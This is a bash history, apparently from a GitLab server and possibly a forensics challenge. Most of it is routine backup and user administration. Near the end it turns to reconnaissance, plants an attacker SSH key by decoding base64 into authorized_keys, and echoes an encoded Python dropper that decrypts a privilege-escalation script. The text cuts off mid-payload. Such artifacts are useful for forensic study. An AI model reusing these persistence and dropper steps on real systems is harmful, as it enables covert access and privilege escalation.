cd /var/opt/gitlab/backups/
ls
ls -lah
cd /etc/gitlab/
ls
cat gitlab-secrets.json
ls
ls -lah
less gitlab.rb
exit
cd /tmp/
ls
cd gitback/
ls
cd
exit
cd /tmp/
ls
cd gitback/
ls
rm *
cd ..
rm gitback/
rm -r gitback/
ls
ls /
exit
cd /backups/
ls
touch 12313123
exit
crontab -e
exit
crontab -e
which gitlab-rake
crontab -e
nano /etc/gitlab/gitlab.rb
gitlab-ctl reconfigure
crontab -e
cd /backups/
ls
ls -lah
rm -r *
ls -la
ls -lah
awk -F: -v v="git" '{if ($1==v) print %6}' /etc/passwd
awk -F: -v v="git" '{if ($1==v) print $6}' /etc/passwd
ls /opt/gitlab/embedded/service/gitlab-rails/
ls -la
rm -r *
nano /etc/gitlab/gitlab.rb
ls -la
gitlab-ctl reconfigure
ls -la
cd ..
s -la
ls -la
exit
ls -la
ls -la /
cd /
chmod -R 0705 backups/
ls -la
cd backups/
ls
ls -la
ls
lsls
ls -l
exit
cd /backups/
ls -la
cd ..
chmod -R 707 backups/
exit
cd /backups/
ls
ls -la
chmod 704 *
ls -la
exit
ls
cd /backups/
ls
ls -la
ls -la
chown -R gitback:gitback .ssh/
chown -R gitback:git .ssh/
ls -la
chown -R gitback:root .ssh/
ls -lah
cd /etc/ssh/
hostnamectl
hostnamectl set-hostname gitlab
cat /etc/hostname
exit
ls
crontab -e
hostname
exit
adduser
adduser gitback
cat /etc/passwd
userdel -r gitback
cat /etc/passwd
adduser --home /backups/ gitback
ls -la
cd /
ls -la
cat /etc/passwd
ls -la
cd backups/
ls -la
rm -r *
ls -la
cat /etc/passwd
usermod -a -G git gitback
cat /etc/group
cat /etc/passwd
cat /etc/shadow
userdel -r gitback
ls -la
rm .*
rm -r .*
ls -la
rm -r *
useradd -h
adduser -r -M -N -s /bin/false gitback
useradd -h
adduser -M -N -r -s /bin/false gitback
useradd -h
adduser --no-create-home --no-user-group --groups git --system --shell /bin/false gitback
adduser -h
useradd --no-create-home --no-user-group --groups git --system --shell /bin/false gitback
cat /etc/passwd
cat /etc/groups
cat /etc/group
userdel -r gitback
cat /etc/group
useradd --no-create-home --no-user-group --groups git --system --shell /bin/false gitback
userdel -r gitback
useradd --no-create-home --no-user-group --groups git --system  gitback
cat /etc/group
cat /etc/passwd
userdel -r gitback
useradd --no-create-home --no-user-group --groups git  gitback
passwd gitback
cd /home/
ls -la
chmod -R 750 administrator/
ls -la
userdel -r gitback
useradd -h
useradd --no-create-home --home /backups --no-user-group --groups git  gitback
passwd gitback
nano /etc/gitlab/gitlab.rb
gitlab-ctl reconfigure
cd
ls -la /
chown -R git:git /backups/
ls -la /
chmod -R 740 /backups/
nano /etc/gitlab/gitlab.rb
cd /backups/
ls -la
rm -r *
ls -la
cd
ls -la
ls -la /
userdel -r gitback
useradd --no-create-home --home /backups --no-user-group --groups git  gitback
cat /etc/group
passwd gitback
chmod -R 750 /backups/
ls -la /
nano /etc/gitlab/gitlab.rb
gitlab-ctl reconfigure
nano /etc/ssh/sshd_config
chmod 740 /backups
chmod 750 /backups
nano /etc/gitlab/gitlab.rb
ls -la /
usermod -a -G git gitback
cd /backups/
ls
ls -la
timedatectl set-timezone "Europe/Moscow"
ls -la
rm r 158*
rm -r 158*
ls -la
ls -l
c ..
cd ..
ls -la /
crontab -e
cd /backups/
ls
ls -lh
rm -r 158*
ls
ls
cd
ls -la
ls -la /
nano /etc/gitlab/gitlab.rb
gitlab-ctl reconfigure
apt remove nano
cd /backups/
ls
ls -la
ls
usermod -a -G git gitback
chmod 750 /backups
ls -la /
ls
rm dump_gitlab_backup.tar
ls
ls -lah
touch 1
ls -lah
rm 1
ls -lah
touch 1
ls -lah
cd /etc/gitlab/
ls
ls /backups/
cd /backups/
ls -plah
rm 1
ls -lh
cronab -e
crontab -e
cd /etc/gitlab/
ls
tar -cvf back.tar gitlab.rb  gitlab-secrets.json trusted-certs/
tar -tvf back.tar
cd trusted-certs/
ls
ls -la
touch 1
cd ..
tar -cvf back.tar gitlab.rb  gitlab-secrets.json trusted-certs/
ls
rm back.tar
cd trusted-certs/
;s
ls
rm 1
cd ..
ls
cd ..
ls
tar back.tar gitlab
cd gitlab/
cd ..
tar -cvf back.tar gitlab
tar -tvf back.tar
gitlab-ctl reconfigure
ls -la
ls -la | less
cd gitlab/
ls
ls -la
tar -cvf back.tar /etc/gitlab
ls
rm back.tar
which tar
crontab -e
cd /backups/
ls
ls -lah
ls -lh
crontab -e
ls
ls -la
ls -lh
ls -la
ls -la /
chmod 750 /backups
usermod -a -G git gitback
crontab -e
ls -la
ls -lah
crontab -e
ls
ls -lh
gitlab-ctl reconfigure
cd ..
id
pwd
uname -a
hostname
ip a
ls -la /
ls /home
nano ~/.ssh/authorized_keys
/bin/nano ~/.ssh/authorized_keys
/usr/bin/nano ~/.ssh/authorized_keys
sudo nano
sudo -l
which nano
vim
which vim
which vi
python
which python
which python3
ls -la
sudo apt install vim
sudo apt install nano
echo "c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDaXdKeXFycVU1T05OWGE1SzBleitWVndraFVIenBlVEtvdTlaeTkxeWFvamduRE5EMzhMRWM2Y2NmYWpCYk0wSnJjVGZQTE95cHhlWEE3NlNhKzFvVnEzVVJRb2hlOFd4RHV6S1N2TWhySlVpNXJ1YkVsY0FDWWZMYWxEK3QrQnRsK1ZBTFliQ1QzSEZ2LzBSSmsvUzVtU1M2VnBsbjZxUkRxbDErM081MzZ4UFMxaVVkM0h4RnRNSzlkWHBvRHpueVgrVS9GZlQ2Z3pxZEIySXNTYU5ZRGNvaFNLTGlkeFJBQWNSZWVpbk1ZVU9KY3dxTGdYTmtqVEMrSFlNWG9HK1g5d3FTRnM0Nkk2ZVljYlRDRVZ5NGhDRUw1ZVFORFlsRkpOY2MyUC9LMVNab1JXck1FVlFGZTZKUUV5NDRvZWYzUXZiT2NnbkZ4Z25Lb1JLWXdaUWYgYmFkZmxhZ3tzb3JyeV9ub3RfaGVyZX0=" | base64 -d > ~/.ssh/authorized_keys
cat /etc/apt/passwd
cd
echo "ZnJvbSBiYXNlNjQgaW1wb3J0IGI2NGVuY29kZSwgYjY0ZGVjb2RlCmltcG9ydCBoYXNobGliCmZyb20gQ3J5cHRvLkNpcGhlciBpbXBvcnQgQUVTCmltcG9ydCBvcwppbXBvcnQgc3lzCmZyb20gQ3J5cHRvLlJhbmRvbSBpbXBvcnQgZ2V0X3JhbmRvbV9ieXRlcwoKCmRlZiBkZWNyeXB0KGNpcGhlcl90ZXh0LCBub25jZSwgdGFnLCBzYWx0LCBwYXNzd29yZCk6CiAgICBzYWx0ID0gYjY0ZGVjb2RlKHNhbHQpCiAgICBjaXBoZXJfdGV4dCA9IGI2NGRlY29kZShjaXBoZXJfdGV4dCkKICAgIG5vbmNlID0gYjY0ZGVjb2RlKG5vbmNlKQogICAgdGFnID0gYjY0ZGVjb2RlKHRhZykKCiAgICBwcml2YXRlX2tleSA9IGhhc2hsaWIuc2NyeXB0KHBhc3N3b3JkLmVuY29kZSgpLCBzYWx0PXNhbHQsIG49MioqMTQsIHI9OCwgcD0xLCBka2xlbj0zMikKICAgIGNpcGhlciA9IEFFUy5uZXcocHJpdmF0ZV9rZXksIEFFUy5NT0RFX0dDTSwgbm9uY2U9bm9uY2UpCiAgICBkZWNyeXB0ZWQgPSBjaXBoZXIuZGVjcnlwdF9hbmRfdmVyaWZ5KGNpcGhlcl90ZXh0LCB0YWcpCgogICAgcmV0dXJuIGJ5dGVzLmRlY29kZShkZWNyeXB0ZWQpCgoKZGVmIG1haW4oKToKCWNob2ljZSA9IGludChzeXMuYXJndlsxXSkKCXBhc3N3b3JkID0gaW5wdXQoIlBhc3N3b3JkOiAiKVs6M10KCXBhc3N3b3JkX2hhc2ggPSBoYXNobGliLnNoYTNfNTEyKHBhc3N3b3JkLmVuY29kZSgpKS5oZXhkaWdlc3QoKQoJaWYgcGFzc3dvcmRfaGFzaCA9PSAiMmQxN2MyOTFlNDM5MDAyZGEyNjgyYmI3NzUwYTA1OWNiYzJjYzRhMGE1YTY4NmExNTE2MWIzMDM3NGM3MGRiMmFjOWJjMzFjOWFlZTgxOWQyNDZiMDMyYmMxMTlkMjAxYTRhODg3YjlmOTNhNjFhN2ExMjdhYmFmOTVmMjljMDIiOgoJCWlmIGNob2ljZSA9PSAxOgoJCQljaXBoZXJfdGV4dCA9ICdwNnV0VjI2OWpCNWpHN3A1cGgxakRSYytzaW1Vakhic1VpRmtlYTJzamJwVDRCMm85bUl5Q29FZnloOEcvbFd5RGkrTFRnSkJhR2tCY3ZSM1NPcW5EeGtDUUJJY0hSeUIrSEp5L3dBck5sRHYwSmZ6ZEUyUlRpZ2Q4ejNIWGNCNStRaFo5NFhySWp5QmNhVFhSUS9Fa1FoRG8rZm5iVmJWZ3dNdm05TTFzNmdCT2huU1E0Q2VTWUFXekFxdHZDT1dFTlFsRTZpaGRYSlZmUjk2YzFBajdhcHJncFJadUFHM1BhZ1o5N0dYcVUwM2pJVDRsUVYxR0JsTTNzdnMxQkYwZkRuNGVZbndmUncrMUhtVTQvVDVFMVByWXU1dmgzR3VPdTFnM0orQUlMU1htWDNWUTJCNVVPME9DOGRweFR4YmRiOHBJUmxwa2RYT0Z1ZGNoRGJaZWxQVUlVZGtQZ0Yxc1JZUUg0U3VzT0QrQkpSMkI5dmU1YTU0N3Q1S05tRG9BNitDNTE4VjQzd3dQYzBPVGNWcjRlVnNzQ1ViODE2U29sRHNFamNsQmdXb2RpQ3V4OHdkWWwvOTVPdHQvY2ZGU3VaemQ4MVk0aVhIelVxbk9PMkpBS05KODRrN0FYaFZ2S2EzRkpuMlg2ekJ6UGs5amVGeGF1bzRBcEMzYVJXM1c3U2hpSTNnSVhXNFAramxveVoxV21YaDVKVk1yWEFSZGJpZU9RTW51NlN4Q3VyQlMzQ1M3TGsyaDZOL0FHZjdrOXNHNzFEd3g5cGNJVGY0SGduWFFoT09qWTVYWFRGNUxjU0NyR0NuSUtMMTNLKzdONTNnQUJBTVBKZm5lQTNPZy84dEtyWTlhZ0lOaC85N0lkNzVGeGF6Y0s5RmlZeDlxZGU4SGJ5TWNRMXJtRHdKZ3RjU0tXWFZISWc2VXRQYXRNVEVRRHB4N0lvNWxPbmFQOTJNSzFjTGNESUowYzBDUGFpRUwyRFNSUC8zN1k1UXR1M0hUdmhYVkh1YXNwejROR3NjTGpuZytnNUp5cGN1MkRVUGNhV1ZWNURvMUxab1JJNE1HbmFIZ3pQOXZXcVRIcUl2UTZIKzRVLy92L1YwLzZXd2UxL2JpYk01dkZkVFVlU1pEcTFiQ3ppVnNjSnJOOEZzTWN5amwxYkYzdk9YR2ZoL0o1UEZWcjhCRXF3UUx0UHYxWXBOajVjRHF2WGpub3FxQmpjTzVlUkNOekhPWWkxYW5PdWRaWWQrcVdlcmxFS01Fdnp3Zm9WRlFTeHFwKzlBWXA5TzlZclkxRmMrYldGV2tQSERBT0xsVWV2MWdBam4rUTNub01PejZpRmtTZmdkbjRVTTZFbDZnOEFaTERXcGFpYlF6ck00d0laWWFNZUw3VnNMQ3p1eGNWQXh5K2JZSi9RYlc3WEZpOHFDNTFpZGF5WFk5bW9ESEF2ejVWWUhZWTRwYlQ0L0pFYnlram9WVVhyanZ2eGZaUEJHUkJ5V3lzUWFpNTFTOXRSTERXeTFMK3VSaUN6UTlpZ21CSTNuZTR1b2VNc1dMNTByK1Y2d1B1RCt4SWpZZ3dkeFJHZUQwQzAwUGUrQmFqODJKd1VWWHBiWVBGK0o0dmR2bmhYa2REdk80OXgwWCtrdUpuMEJPSFhYYWQ2MFB6VlIrUFlGTGJTTVhqTjlpNm9UM2JBS3RJUlkxay9rTnI4OHVDcERLemlMOWEySVIyc1B5VXJVSlR1SGRvaE1DZnNvclZIM08rMlhiRnUvMHRxVmNITTlHS0doeXk4R3l6VTVXbzRCSm50NEVaY3ZqcFVaSk9mOHdHdCtEU2N4a2VqVUF5RlVQNlZDb3JRZzJ4eVJaRklBME4vckh1eUppNzYyUnlrWnN6b0E0UUg2cm1TTDcwZG5OcnJSOGV5M0dMdUlnNS9LanBrZFNRQStWMHJORlpBV1AvSy9PcWJnWGlLTzltNWc4akI0Q2dWTUY3RFFvNGFCWGpyRXdNeXVYSW1lckdzQUJGNTJXUzBwMHR2VXJhbkNaQTNmYk9IdUxNVWR4cDVJUXVaQlVQMndadFJFNzc3cWNnVmlhTWpYQ3I5SlhwMkd5ZFViVTFvTi94Zk56UjNEUGppbjJmZjZRTll1M0QyRWdvNUY4WlFTR0RuNXZ0R1VhYXUrRXhoR3JRbk5nZEZpTXRqSHM0WUxONWNWRW1uQndtQXYyQ3R1WnQxVDQ2RkpaaWUyS1R2VzZ5M05BUDFWSWQ5R3FVcGtoK0xIT2o0cUVrL2Nia21sQ3JMT25SeDdGYzdpSkQ1ZC9ldHdNYUtweTJqa2pEem5PMWdCbjRuc2lFYmFKMmlnNXlnK2VVU3VvNGNUVWRSWW16R1Q5cEUzYjdYU1FOcHhSbHloOXhTRXZaTUc4OE52TTN5NEF4QkRWT3VzNE5VNWQ1MXdvWU9Jeld5Z2Z5d1U3bnNSZjhBQ1E2U1hwaGpZa1pXaER5QTJaMW9Jdm0ySFlVaitxbWNOZ09WUjdFN1RsOTg0U3VvamwxcWVIVkMzNjZjY3ZxLzZlYTJIRldQWk44T2ROME1HWU1CNHVpbmdxdVBEK0pUWkRhbUFGQnVkWS9iRStRK2FESDQ1OURRVjRCNzVaVnNsbzNEdGkrU1pzYm03UGs4TEpUaDZCQkx5cTJJVVVPOU5kUW90SjRTVXdjSVZpdUV5MnR6RFgzeXdZY0NVQ1h2WTQxbGY4OWMyQmlQVFBqZDErRzFwQng3eXRkRk1hWXFaQUk2QU5kaC9HdGRKOVhCVUhxajZWeVJoL2lReEpRMjdNaVRENG9ybkZXUUx2dlNuYjNGVktYSkxtaFRoTmlkK21adFo1WWFXWXo3U1d0c3dsZVNnWGdyQUYyMlgxMXg5K0V6WmJWaE15N3NFblZ1TFhBdzkyczVYcUt5L2w5TVhHQW54UmlJZzBvbjR2cGdRM21OcTVFYnZVeGg3R0l2NEg0RkRLcCtPMW5pOVpzNFFSRDY0YkE2ajhNS29GYU9yT0lBQk9oNFV6VUY0R202RzhSN1RNWUxnamdEbERaSFBTUVlzMHhvTG1DellEVDBNUXhhcmdLbjlKMTd3SkkxMjZXNTVxU3BkS1FMbE8wbEVsQzJXL1VuRk9tMGVBdVJ3dUhEYzdXRVBoTFBlYTV6N0FLQUZwK0NaVm00MkpFNVdBck1kSEEwNVJYNnNUYzdHa3Jmbk9abHpnM0tLYjJGZVQvZ0poemJBdy9PeW5VUUFBK1RnRmkzdDBhRW5Ic2k3cjJKOVRWY2tFT09YNlM0K0lqUnhVeE1tN3ErWHJCRDJvYjVEMjdrczV3NmZmRWZxd2svVG8zWkt5Rm9RbkpXYUdNVFJmTVlHUUlxdjRtQkZLazlzblRKK2hSQU5DWHJHeGxpNEtDRlZNU2Izb2pzS2VacEg4eEdrOVVTNFhtcm10WU45RXBWaVl2ZWowK21zOHlnVDIvLzI1M0s0cU0rKzhidkdZakVyV2VUVXVhOEhYNXE4Rk83ZjJ0b3A3TURrSGp0MWJOVUtxTEN1SGRiUXMwaHVuTVR1ekNnVlczZ3pWbnQxMDNxSEhzbFUwdndNbTBpWXJlUDlPeXFya01lVkpQM0orcHFuY1pPRlI3RUFsZDJvTk0zVnlOMXRMTEd0RXl2cFp3QlRiQXc3eGV2eHI3QU9wSWdFSUJyMFdlSmlZZG9YbWZ1RHUzYmJhQmY4STZiOWtTVlZFL0t1U0ttbllCV3dxS2JCTnRpWEpUcll4Sk5teklPeHFpRUJPekcrVDlwR0xCYVlJdk1kUktnMjY4QlQrbHZIVjZ1UWlHZnFxbUcyK0F5emRrMUNRQnd1eU5PVzY1OHNYbzBHUjArNGUwOU5xMTFrSzVXdDVkMkVCNW1Kd1g1dWVuMGFCZ1dPM280M3d6NU12dmlxUGpxdmZlRk5pWUkwcGRJeXlWUEpjdUxMYm1oRUV5LytFQlJxN3lxMnVId09ONmM5UXcxdHBqOWlaV0lGWmthZ0JTcFlndWVRTkNGZ0lYbVlzS2dTRldzVllNVGZDOU0wVnNNLzFJdUJZc1diY2JKaEpPVXV1aGVBVmNadlMxMkQ1UVBHY0dtL2FiUmorcThJaGsreDlkWFM2T1MwV285NWFaNTZnUGxjVUtBZlBwLzhkTSs5QzhyNjRuQThhc2NxRVFFTkc4dFBwODlXMXk1ZGRzaVFQTUVXMXhBdnMrS1Fubzd1ZlR3V3pPa1IycHZ0U1BJMy9mWVE5ZDlNVE1KV1FOWWpyQUc5Z0F5VDF4SUVEZ2VvL2hMME9SY1lUak1pbHhrTDhmdXljUWNPWkYyUDF3YU1UK0ZRd1ZOdW9FNzBES1Jjdm1uYlpQNmxpS01MOHhGdW5XeGg0MTB2VFhQcG9wL2hyZlY4RXY5V1ZTaGVVekZXREFaOG5jekFEaG9zc2YvTitIZFhvZ0lSYkVTalY3V2V2ZFBRN1hpNjZXQnl5bXE2eENuNUlqWGdKT2h1SGJmcG9nM1dzU3k2VlJ2ZVdzYnk1NHQvNHZTeFJOSnBpMWplWW9hTVVwRGN4YXg4TmFJaTZiQWhSdThTOWkxOVg3U285UjFwdjIzRzRtZkFOTE9JSklQSUJrSENOM3hoa2lxeDhYdG9tTWh4T09SYlNUc05IQlpBcGdodVhWMTNZZDVJRkF5OGJZU1V6SldsdlVlSVBKNDZDUHEvaUZWODVxK25pZ1QyZHBJMjNuYm53M001dTRIbnZJb0NRemc2RXhFNzNpM2pWNmhNdWNuMGMyQkhuK1JTUmsvK2tFTlBsekZBcE1LeGc5SnhaUHhaUlJnbWthUS9XV2k4OHc2QmRrUEpySDB3cDJmK09WN0xkTmhnSzFpeFA4MTNvWlVGd1FhOXBJVytQMHYrbmNqaHpBcjd6WkgxM1NkNVF1WE1RYXlCY2RrWlcrUTU1eTRySkdHQ25KZmtPNGZoQ2Y0REVOcE90Q1BWNjJkUDNUWTdKaVFUV3ZwS1NXamZ2dE9hMzZUSzlxd2ZPaGtTUUhzNWFMMDNYTFEvb2VuanUra3Fnc3FGdGE5MGhIZnF5OExmVlVSSklSY0VwK2NGelZoVkp2THNSbkxHVVhmOU52T0l6UWQ3ZFZtOG1RQWNTSWpZSHhENStZcmxwcGFYeFJTVmc2QjQ5L1ZNTjlTWVIrMDNWeWxWUE1udy9BVzdDY3JqZ0x5Y1Q2OXByL3JJQ3F6cUtwK0tpaVpkWXliS1lxSzI5eUR4azVFMDZ1bGo5YkR3dUFFR1I1ZGJCMmgxSFY3UkxhZ0Y2YmI3Z2V5bThvVUVWd0E3WDNORlBrMHN2SjJWOUt4eE1mMC9PUmx0R29GR2dBMzF0N0dobzBOd3FMakVKUStiL2l2WmU1Qk42NnZNeXdlSW5UREJxaDJHNkRnKzB4a2wzZDBYa1pOdDVHWUdmZ1RFK3Z4U0JCeWsrTzk1ZTVDSnJXYi9qT0M4dFlLRzJTcU56N2FSL1FzQkxYRjBOSUc1Nk14bHgzQjdiaCs0eDFlbWRLTHpyaWFiSGM4VnREY3lQUU5UaC9rK0JlQmJ3L1JCd1ZTRk1jY3NlV2x0SGlFQ1o0dFJUSnlTMVMxd205V21BZ3M5OENSRnZOWnlnaXozdis5RTRSVGlTSjR3dFNRSXE3L0VhbC9Wd2lzanVseHdKRXZnenlkeTh0d2p4aXlWTEFtYkR6SU5MK2ZLNVdUOGxMQUQvRmkwVU5RMFRuaUh6OEpWZFV0aE1FY1dIb3FhVndwRzJOTkhPOC9oT0o4MEI4eGhjQVBjSVVTOU8xLzZYUjVZRnRFbDNFczNDdVE5RldpMG1rWWhQK3ZPVjZJLzJxVWNJSlA0R2MzcTVGbFUzSlhJZFBOYmE2RTU0M3M2cHBFbHlOZ3RBYjR1MnY1YnhyOVRuZkJTSUlMSDloSmd1YjV2R1hpem5NazRlUlgrK3AyaytBTUYzR29la0Y1TTFTSERGYWtsSVQrWkFuK1ZDTnJUZjBXakRXaW1UVldWdE9WVnI2eVNuWTJiQ0JqbS9DK2Y3enM9JwoJCQlzYWx0ID0gJzMrQUhDVWsxN3NDeXQ0REdjTUhkZmc9PScKCQkJbm9uY2UgPSAnazhYczFNejlIQ1RWeklrNUE0SDRYQT09JwoJCQl0YWcgPSAnR055azErY21WYitucnhKT0JvQVRXdz09JwoJCQlkZWNyeXB0ZWQgPSBkZWNyeXB0KGNpcGhlcl90ZXh0LCBub25jZSwgdGFnLCBzYWx0LCBwYXNzd29yZCkKCQkJb3V0ZmlsZSA9IG9wZW4oInVuaXhwcml2Y2hlY2tlci5zaCIsICJ3IikKCQkJb3V0ZmlsZS53cml0ZShkZWNyeXB0ZWQpCgkJCW91dGZpbGUuY2xvc2UoKQoJCQlwcmludCgiRGVjcnlwdGVkIikKCQllbGlmIGNob2ljZSA9PSAyOgoJCQljaXBoZXJfdGV4dCA9ICcweThFTTFQcUVUSlk5cXkvNTN3aEZZeTBGRDFybzd2N0E0NzZXWXVEdmN4UkN6SVBzNytTbzdlL0tKWk12dEdxMSt1UjhEeXhkcXlYZjBKVDZ3ZTh6TXh3T3owblhYVzF2cUxZOG02eXJudnRyamF5MDBHcCtMamM2N0tCeG9uU011dHVEaFd6Z01QZlh2YTFZTUxRRTRicXNaZWRZR3M4Ylp2M1YzaWlZUFNvYjlPM2pDNTgxb1BPMmFhUG5RM0Flb3lSeVdOb1Rqc05Ody83K1AydVJ6ZGpuVXF4d2E4TVB3cFhQait5aHNINWpSMEtWTmMycVRDRXM3WmF2YzVUVDY2eERCelY4dytYT2RqeTgveFloOGVQTmR4UXE5SUxwOGNnNzVqN2UyZ2RBZHVnTHhhT2RoVVIyRzhkd0UxN3JMTm5wMmd2RWFZMEFNV0NVTGREcVN0N2hmTUs4SUh0VjBnYlF0RHZ6N1lQSmNOWDExbDdMa3dsU21QWEJBNkowQ1czbDBVUHYzb2JSTzVYZDNNLzVMU0pQclM1Q1FFNkNWbEh6MEZHVUFvSzBTU2dRSVZCcVFJWDlFY213MzhYNjRUR3hrUVVETFFQc3I5Q1VGL3IyK0ROazN4SlJwZ3VDeW5xQW5PcjJYM1Rjekk3Vmx5ZXdrYzBoUkRWOXJKRnB0SEtQNkdxQkdoSkRWUUlkOUJIZ3Jza3hFWHR0QVBVL082UTdKbjdyMmo2S1Qzc2p0ZkNKWVpxSUdySVVFNnF4VTlXQWRLTVgyMWoweUVJOUpEQ0N3L2U2VllQNnJYTVR6ZVJCeVo4TUoxeFZGQVJKTU1uZ2YyRE1xSStxcHp5RHlENFBzOXAzaXZVaVJmeFZVc1kwYWw2TUd1dFIvZFljTUZheEFGelJKdW90WUxJT3puV3dsc05iUUhTWmR6SmhKOXlzcXFlMU5DVkVWYnNIbkxBM3JnREZ3ZlAzaTFVcnpXU01BMFBvaWZyanhrMjJwVkxkaFVuTzlBSktrZnpxZVRlOXR0OWs1VVdkT0lEVVFqRHVNU284aS9uK2s0WWhhUCtOdXJtVC9TMm1vQ1dxeEVQMHJMZlhReG1ablFYNlk5RGhyeUtyVGpDbHRMUUxWZk8rNFpwTUdrbmdiMHM0WXdIbkVxWVJZUXhramx2NU1iaEgxOTB1REdPTm03MmQzcjlvOGl5U2RHbnNLNDlXZmR3UXdPMWVXUEtWMmw3eElUTXYvajg4VnFqRDRQcmsxSHpFZFQ0aGpxMEhCRlZTRjFqNzg0MnltYmF2N0xZckpYNGg1VW8zaTRkWjJ3WUl1QkJ3bWlHM05QbEVkczFVQzNhTk8yNGVNZ2FHQTBwMXJUdWJEdE5rdjYvMVZjVENqRThGUmFzai8rTjR3eWJUK0xyZTNzb1cvMHJLdTJ4OFdxL1RtcmRIR3NQQklHKzVDSi9IUmRZbXd6amlMdG5ITm1TbUFCKytJUG5VUGhBSW1tODNRMXlWWmRkWU9ZQ0lCZy9xT1dZbmRtVzBNMnBZVko0K2Rlb2t6ajNhdDVTa3BPekd6OFdIa3ljd1Exd1lMRUxRWllHZTFlNjZDeHVUSG55cnVQbnRMRUtOTFVHR0Q2aEZ6R0pQWGc5NGN5S3JJemJYUFdPVTRZOWZyRTdCQmRIeDl3QzUwQVMzR0hpb3NPWnNxODk4eExWMjlLQ1dZaXVsdGJpRlFaZWhwMi9FOE5rbUR4N0c2U2RJekFqS1k5a09naGtIZ3hwSUFzbjhhSk5JRzFlOHEzQ0p4Z1pZK2E4NDB2ZW9La2EyajRsU0xxUmZrQnhLTzdzYnZIdDM5bmRDaWVvbE13ZzUxdmYxM3hhd204aFZldUJDOU4vZXBBQzZudjFyanFwY1kwMTJncWswU1llVkV1SWVGK2tDZmVmbkZydVJnK1RBNHQ5TU92Vy8rYUs2SSszcXlTRW5lODltVFNMaFR5VG15am9Ia2pnUW02Ryt2V0pwZ1RLendBSHJCYnZYUTBOdWZ4TjZuYUc3THNwNXQvZ1RWeVJOdENTeG5VbHIzOWtzK3ZPRXFGMGd0L2g1VzNOa1Y0VGpuVjd1RittcDh5WDJ5M0RSSG5UTWdwNVdSMXY4VmpyL1dEQW1LVDd3SmYrc1pscGxUSTJ6d2FQUTY5cXhvRlZBWmpyaC9LSDJyRjNFRjZ3TVp1RDUyVkJGVmZtdjhycHVHOWtrUmRwYjNBMTRTVHRwQWFBUWhDRVB6R1dLK251Wk5RVGdkM0E3bEtwWlliaEhMNTdTVkxRREhwTkRDRXVrTDlleTNlTjBrb3Erc0Y0SzVncm9OODhjZC9sd2pKS2hDcnpZb0NGZ3ZxQndGRENWSkRoNmROY1ZWVWMxTy9WNXNrU3hLdWYrVmFUWVRGQVU1Ynk4dVMrUHpHdGdKZjJNMjJQSitPdEtMaHNPZTBZYTN5VnpSUlFYdmJVWThMbTNQQkNSMlB1dkNwVnZ4elVFbFRhSXJob0szRFF2VmJqRXI5c0E0S0ZtWlM0a1VNcjJkZFlCQW85RlZmdE44MWx3N29tQ2ZkRk9va095SGFDWVBGdS9ZaFNicytsQmEreTEyVTB4WFRXTm53eFFIWllsYk9WUXVUUWEwamRmdldGRFRGOWkzOUdMY3VlYjRzRDFEYnZJTDlrT2pKb1NRWmhGbko1TjlJTHg5VG9UejlLenlSV0pVWW9iMldETC9kSFh3N0tINkJLR1hpczhDUE8xOXQ0amVrVGlYMXhEelQ3bkF3c1NTeFNBblVjSkN6TjRhVEtyRTBQZHMyOGJYandWeFBrQTBodUgrYUh1b3VvakpKc2QyQ002UWtyV2l5MHdaWWFaZXZCc3VJQVFCamVrYVJUaUNXT0VSVWIzN2VUK3I3WGdHRWlHQWlvaVFRVlVITDdaQzRtdXVZVnVFSFoxaC93bjJyRjVRamUwRnB6aWRGa1JDOTFhUllJa2tIYkMzUDArSG9aeUZubWowcllDcWlBem9CVlMwVWEwNHJmOVJnWGt0YldVM1V5OVNGaXNpU3BEUTJXNG9UWG02Zmp4Vnk1Ui81UFFzLzZVNWlEcFhMaGZoVmZvWHlXdFJEQ0ZDSFB0S3BZM1V4R1IvRi9seFowQklqb1FIUVFpOHhzdWhDNDlydEtBNC9TNVd5cTZPM2U3NXR3QjJ5cms4UFhBVEgzMHg2d1kxbFozMElSeFhLck9SMzVKMzVKT0hTNmwxU0JCT3VJNkJEREY5aWt6aFlXM2V0WXN3UFVPRzRkOEtMT3JZZVJmRjZvZS9oc3FnQjZlOFJPbElmMi84SDZxVEtmNWFmRm4xU28zU3BNK0psVHg1OElhTFZ5WHV6aTBnZW5jcENmcGt3cDVRYzF1dlhRaWlBaXoxMXltOEQ3Y3NwaXljUmF4M2ZMMTJjcDdNRWRqalNaRmhnT1NDakQrNzh5NjI4TjBBalU4U2h0b0NOZ3dPckVQa3N1aVo1TVN2Q3V3Q0w3Z2x1WUN6YlNTdmNGdE9SM1FFdFhUREhPQW04UnVpRlMrMXgvQ3ZNQ3AvaHdLWmVFd0hvRWc5TWNUa1VBVXEzdnMrTmJMcDRJWlF1bjBPMG4yY2FTNGswMHowMFQzQjdDUmt5ZEo4UzRWYyswTXpvYkdrU212YjJpZXYwanQ5NUxjQ0JzTDMySXBISTI3YXRHQ25DT2xLMnJyYlM0WExYZDdsMHZKaUNSSEdPQzFwU05HdG1UdXhQcmVVbEd3clVuR0JDVmY5dzNGZ2FVWXRQWExuWTFVeGcra2NHeFlsalFHL2pOaVM2NmpnZVRMTWNXNkREZHVGeTByL3V2Rkp4czBaS01SRkNoOTNCM2piRXF6VDdkMjZjREdFTFIvUWhaMUY0aFY1SUlxcUtDcVlSS0hQUEdoUTgyUlkycFFwTVkveUFEcVgwSHRsaG9LQmFTUFlNVFd4VTY1VXpIRzQzbVNURGRHSmJTZVlPUGthSDVwT1dUSnpSVkVLcEpJSUpuNE9kUmpJcjVLYjZvcUpvT20yL3RhRG5MYWd4QmVPaE85dEk0YkN6anIwdWt0Ky83dW5TNW54VWlVNHhLQkJXdUMvTWs1Yzl0OWExWGc2d1RFTTZGVWZRNU1xTndjK041b3RWZEJFWFM3b1pYR3A3enM2VmZQMkhWQndXMllyUXRoSy95R2tsbjhqWXQvTzZyMWtoWm9lM3AvQkk2aW9kVGd4RC93R2VlNlBGMDc4S1RBK09CcEV2M2ZKSllDOGtRYS90ZXhQQy9ORkN0WDZZcnpFRThhMzRLbWUrR285YW0vS2Z1TGZCb1lWVXc5ZktGV2FyTi9ORjNrdHNCNjZ0TDRtMmtsOTU3Q2d4Rjc1djNPN08vOEZSM0xsbmNhZHRIOG0wd3MrRzRLY3F2enFyc3J2RmxmTGVYTEY0ZlVpQWl1Nko1L3U3Y2xjaHFGNHNjWGpZeHM5TUZUcC9CTVFxb0F4OHNNcUV5NVhQc2gyYW5UcU8zZVEzNWhGU0tBUy8yZWNFcEhPbVo3YjdwSEtVTVdOcFMrVm